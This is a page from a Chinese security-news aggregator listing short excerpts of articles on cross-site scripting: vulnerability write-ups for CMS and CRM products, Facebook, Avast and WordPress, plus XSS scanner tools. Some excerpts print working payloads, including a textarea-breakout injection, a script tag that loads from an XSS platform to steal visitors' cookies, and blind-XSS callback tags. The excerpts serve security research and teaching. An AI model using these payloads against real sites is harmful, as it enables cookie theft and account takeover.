记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

咪游网络CRM系统某处xss

在线索状态处添加线索 插入xss payload 提交保存 ![微信截图_20200115184120.png](https://www.heavensec.org/usr/uploads/2020/01/411496247.png) 保存后刷新页面可直接弹窗 ![微信截图_20200115184644.png](https://www.heavensec.org/usr/uploads/2020/01/652881937.png) 审计相关代码发现,在代码处未规避xss有关函数导致直接输出 ![微信截图_20200115184215.png](https://www.heavensec.org/usr/uploads/2020/01/3331084747.png) 最后引发弹窗 有关文件路径
发布时间:2020-01-17 12:25 | 阅读:5115 | 评论:0 | 标签:xss

一款优秀的XSS批量检测工具

0×01 简介 NoXss是一个供web安全工程师批量检测xss隐患的脚本工具。其主要用于批量检测,比如甲方内部安全巡检,人工分析千万级的url资产是不现实的,NoXss使用多进程+协程的方式,支持高并发,可以出色的完成这一任务。NoXss从实用主义出发,小巧精致,不如其他扫描器拥有各式各样的高级功能(比如绕过waf、存储型xss等),深入挖掘xss这里首推XSStrike,但在批量检测方面,NoXss是一个不错的选择。 项目地址:https://github.com/lwzSoviet/NoXss 0×02 工作原理 NoXss主要是通过“符号闭合”来检测xss隐患,使用基于“反射位置”的payload进行探测(目前一共8个),相比fuzz减少了很多盲目性。比如当请求参数的值出现在res
发布时间:2020-01-11 17:20 | 阅读:10300 | 评论:0 | 标签:xss

挖洞经验 | Firefox for iOS浏览器的二维码扫码XSS漏洞

在手机中,我们通常访问一个网站的做法是打开浏览器在地址栏中输入网站地址,一般来说这样的方法有些烦人,所以,有些网站访问对象通常也会生成一个二维码图片,方便用户直接扫码访问,只要用户手机扫码就能跳转到目标访问网站,或是把相应信息显示在用户手机中。几乎我们所有人都会用手机的扫码功能,但是,你是否想过,如果你信任的应用APP其扫码功能出现安全错误,会发生什么情况?今天,我们就来谈谈Firefox IOS v10浏览器中的扫码XSS漏洞。 Firefox IOS浏览器说明 根据苹果应用商店的说明,Firefox IOS v10中加入了更多新东西,极简的用户界面,可以隐藏多余显示图片,增加了一个二维码扫码功能,能突出显示浏览记录和最新资讯。 也就是说,从Firefox IOS v10开始,
发布时间:2020-01-06 17:20 | 阅读:7777 | 评论:0 | 标签:xss 漏洞 iOS

XSSFORK:新一代XSS自动扫描测试工具

什么是XSS漏洞呢 ? XSS(Cross-site scripting)译为跨站脚本攻击,在日常的web渗透测试当中,是最常见的攻击方法之一,并占有很高的地位。它是通过对网页注入可执行代码且成功地被浏览器 执行,达到攻击的目的,形成了一次有效XSS攻击,一旦攻击成功,它可以获取用户的联系人列表,然后向联系人发送虚假诈骗信息,可以删除用户的日志等等,有时候还和其他攻击方式同时实 施比如SQL注入攻击服务器和数据库、Click劫持、相对链接劫持等实施钓鱼,它带来的危害是巨 大的,是web安全的头号大敌。 传统的 xss 探测工具: 一般都是采用 payload in response 的方式,即在发送一次带有 payload 的 http 请求后,通过检测响应包中 payload 的完整性来判断,这种方式缺陷,
发布时间:2019-12-26 17:20 | 阅读:12330 | 评论:0 | 标签:xss 扫描

FineCMS v2.1.5前台一处XSS+CSRF可getshell

FineCMS一个XSS漏洞分析FineCMS是一套用CodeIgniter开发的中小型内容管理系统,目前有三个分支:1.x,2.x,5.x,这次分析的是2.x的最新版2.1.5一、用户输入既然是XSS,那么就一定有用户的输入以及输出。// controllersmemberInfoController.php public function avatarAction() { if (empty($this->memberconfig['avatar']) && $this->isPostForm()) { $data = $this->input->post('data', TRUE); $this->member->
发布时间:2019-12-21 21:40 | 阅读:13530 | 评论:0 | 标签:xss CSRF cms

挖洞经验 | 利用graph.facebook.com中的反射型XSS实现Facebook账户劫持

本文分享的是graph.facebook.com中存在的反射型XSS漏洞,攻击者利用该漏洞可以构造恶意链接引诱受害者访问,添加账户绑定邮箱或手机号,从而实现对受害者Facebook账户的劫持。 漏洞情况 该漏洞只在IE和Edge浏览器中有效,漏洞原因在于graph.facebook.com中的某些API端点,在处理HTML代码响应时未实施完善安全的转义措施。响应消息存在于JSON格式中,HTML代码被当做其中一个字段的值也包含在内,而且响应消息不附带Content-Type 或 X-Content-Type-Options头,这样我就能有机会在IE/Edge中构造代码执行了。(这两类浏览器会扫描整个页面确定MIME文件类型,而其它浏览器只检查前几个字符)。 漏洞复现 1、首先,我们发送
发布时间:2019-12-14 17:20 | 阅读:11799 | 评论:0 | 标签:xss

挖洞经验 | 从Avast杀毒软件发现价值5000美金的反射型XSS

本文讲述作者从Avast桌面版杀毒软件中发现的反射型XSS漏洞(CVE-2019–18653 & CVE-2019–18654),漏洞原因在于Avast在新加入某个无线网络时,通过对无线网络名称(SSID)的读取,Avast的网络接入提示(Avast Network Notification )会反弹形成XSS漏洞,攻击者可以在用户接入的无线网络名称(SSID)中构造恶意XSS Payload形成假冒网页进而窃取用户密码凭据信息。漏洞最终被Avast官方分类为高危,并给予了$5000美金奖励。同样的漏洞也存在于与Avast同系列产品的**G杀毒软件中。 漏洞复现 1、在Windows系统中安装有Avast桌面版杀毒软件; 2、构造一个无线网络,其SSID名称为不
发布时间:2019-12-07 17:20 | 阅读:13670 | 评论:0 | 标签:xss

梦想v1.4 CMS平台XSS漏洞分析

一、背景介绍 梦想cms以下简称“lmxcms”,是由“10年”(网名)开发的一套简单实用的网站管理系统(cms)。它是完全免费和开源的。 漏洞类型: 存储型xss注入 漏洞描述: 在Lmxcms 1.4版本(目前最新版本)中,存在一处后台xss漏洞。Lmxcms未对编辑的产品内容进行过滤处理,从而导致漏洞发生。 受影响的系统版本: LMXCMS <=V1.4 二、漏洞分析 通过黑盒测试,我们在后台管理员页面发现了一个存储型xss漏洞。该漏洞存在于admin.php页面的内容管理中的产品信息修改页面中 查看该点 尝试在该点进行xss注入 </textarea><sccript>alert(‘xss’)</script><textarea
发布时间:2019-11-19 12:20 | 阅读:19267 | 评论:0 | 标签:xss cms 漏洞

存储型XSS的攻防:不想做开发的黑客不是好黑客

不想做开发的黑客不是好黑客。 本文只对存储型XSS进行分析。那么,什么是存储型XSS呢? 它是通过对网页注入可执行代码且成功地被浏览器执行,达到攻击的目的,一般是注入一段javascript脚本。在测试过程中,我们一般是使用: <script>alert(1)</script> 通过这段js代码,弹个框来证明存在xss漏洞。那么,可能新手就会问了,弹个框有什么用呢? 其实,弹框只是为了证明存在此漏洞。而此漏洞的利用方式由很多种。 比如,你可以使用xss平台: 写入一段平台生成的xss脚本: <script src=//xsspt.com/ZsgUBf></script> 当某人进入带有这个脚本的页面时,js脚本会获取他的cookie并发往xss平
发布时间:2019-11-17 12:20 | 阅读:22404 | 评论:0 | 标签:xss

BurpSuite自动化blind-xss插件:Femida-xss

Femida-xss (WIP)一款BurpSuite插件,用于自动化执行blind-xss盲搜索。它能够执行主动和被动检查。安装git clone https://github.com/wish-i-was/femida.gitBurp -> Extender -> Add -> find and select blind-xss.py使用首先,在名为“Your URL”的字段中设置回调URL,然后按Enter将其自动保存在config.py文件中。设置好之后,您需要用OOB-XSS向量填充Payloads表,以便扩展程序能够将您的Payloads注入到传出的请求中。请注意,您需要在Payloads中设置{URL}别名,因此扩展名将能够从“Your url”字段中获取数据并将其直接设置为Payloads。Fe
发布时间:2019-10-25 12:45 | 阅读:17307 | 评论:0 | 标签:xss

自动化的XSS漏洞扫描程序:Traxss

Traxss XSS扫描器一款自动化XSS漏洞扫描程序,用Python3编写,利用无头Selenium。Traxss是一个自动化框架,用于扫描URL和网页的XSS漏洞。它包括用于测试的575多个Payloads,以及用于增强测试健壮性的多个选项。Traxss XSS漏洞扫描器Traxss 安装与使用安装工具仓库git clone https://github.com/M4cs/traxss.git1git clone https://github.com/M4cs/traxss.git 依赖Traxss取决于Chromedriver。在MacOS上,可以使用homebrew命令安装:brew install cask chromedriver1brew install cask chromedriver 另外,
发布时间:2019-10-13 12:45 | 阅读:30917 | 评论:0 | 标签:xss 扫描 漏洞

CVE-2019-16219: WordPress (Core)存储型XSS漏洞

漏洞概述WordPress是最主流的内容管理系统(CMS),占全球CMS市场份额的60.4%,远高于第二的Joomla!(5.2%)。因此,有超过1/3的网站使用WordPress。FortiGuard研究人员近期发现一个WordPress中的存储型XSS 0day漏洞。该0day漏洞是由于WordPress 5.0中新内置的Gutenberg引发的XSS漏洞。该编辑器没有超过过滤Shortcode错误消息中的JavaScript/HTML代码。因此,有Contributor或更高权限的远程攻击者就可以在访问被黑页面的受害者浏览器中执行任意JS/HTML代码。如果受害者有更高权限,比如administrator权限,攻
发布时间:2019-10-08 13:10 | 阅读:29299 | 评论:0 | 标签:漏洞 XSS漏洞 xss

通过XSS窃取localStorage中的JWT

作者:{WXL}@ArkTeam原文作者:David Roccasalva原文题目:Stealing JWTs in localStorage via XSS原文来源:David Roccasalva’s blog “Stealing JWTs in localStorage via XSS” 由于很多现代应用程序都在使用JSON Web令牌(JWT)来管理用户会话,如果JWT发生泄露将会导致严重的后果。下面将简要介绍JWT的概念,以及作者的窃取示例以及JWT的保护措施。 什么是JSON Web令牌(JWT)? 简而言之,JWT是一个JSON Web令牌。这是一种系统对用户进行身份验证的简单方法,可以基于开源库很轻松的实现。因为JWT只是URL安全字符
发布时间:2019-09-23 14:05 | 阅读:25331 | 评论:0 | 标签:ArkDemy 安全技术 xss

B-XSSRF:用于检测和跟踪Blind XSS,XXE和SSRF的工具包

B-XSSRF介绍XSSRF是一个用于检测和跟踪Blind XSS,XXE和SSRF的工具包,基于php+mysql的WEB端程序,它拥有简洁漂亮的界面。B-XSSRF界面XSSRF安装下载源码git clone https://github.com/SpiderMate/B-XSSRF.git1git clone https://github.com/SpiderMate/B-XSSRF.git 将文件上传到您的服务器。创建一个数据库并将database.sql导入。更改db.php文件中的DB信息。准备好了。XSSRF使用BLIND XSS<embed src="http://mysite.com/bxssrf/request.php"><script src="http://mysite
发布时间:2019-08-29 17:45 | 阅读:34594 | 评论:0 | 标签:xss

知往鉴今:Chromium近三年UXSS漏洞分析及缓解、预防和检测措施

一、前言UXSS(通用跨站脚本攻击)是一种攻击方式,利用浏览器或浏览器扩展中的客户端漏洞,在访问任意资源(来源)时执行恶意代码(通常为JavaScript)。简而言之:受害者访问恶意网站(被攻陷/被感染)后,攻击者可以阅读受害者的Gmail内容、FaceBook上的私人消息,并可以代替受害者执行其他操作,例如发送电子邮件、上传照片等。本项研究的主要目的,是分析此前三年来(2014年至2017年)Chromium浏览器中实施的潜在缓解措施,并探索可用于预防或检测UXSS漏洞的新技术。二、背景SOP(同源策略)是Web应用程序安全模型中最为重要的概念之一。基本上,它可以防止不同来源互相访问存储在客户端上的数据(即:Cook
发布时间:2019-05-17 12:25 | 阅读:80152 | 评论:0 | 标签:漏洞 Chromium xss

WordPress Social Warfare插件XSS和RCE漏洞分析(CVE-2019-9978)

一、概述3月21日,研究人员披露了Social Warfare中存在的两个漏洞,这是WordPress中一个非常受欢迎的插件,可以将社交网络分享按钮添加到网站或博客中。其中,一个是存储型跨站脚本攻击(XSS)漏洞,另一个是远程代码执行(RCE)漏洞,这两个漏洞共同获得CVE-2019-9978编号。在3.5.3版本之前所有版本的Social Warfare中都存在这两个漏洞。3月21日,发布了针对该漏洞的修复程序,但预计有42000个网站暂未更新至3.5.3版本,而存在漏洞。攻击者可以借助这些运动,运行任意PHP代码,在无需身份验证的情况下即可实现对网站和服务器的控制。攻击者可能会利用受感染的网站执行加密货币挖掘,或在
发布时间:2019-04-25 12:25 | 阅读:83629 | 评论:0 | 标签:漏洞 CVE-2019-9978 xss

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云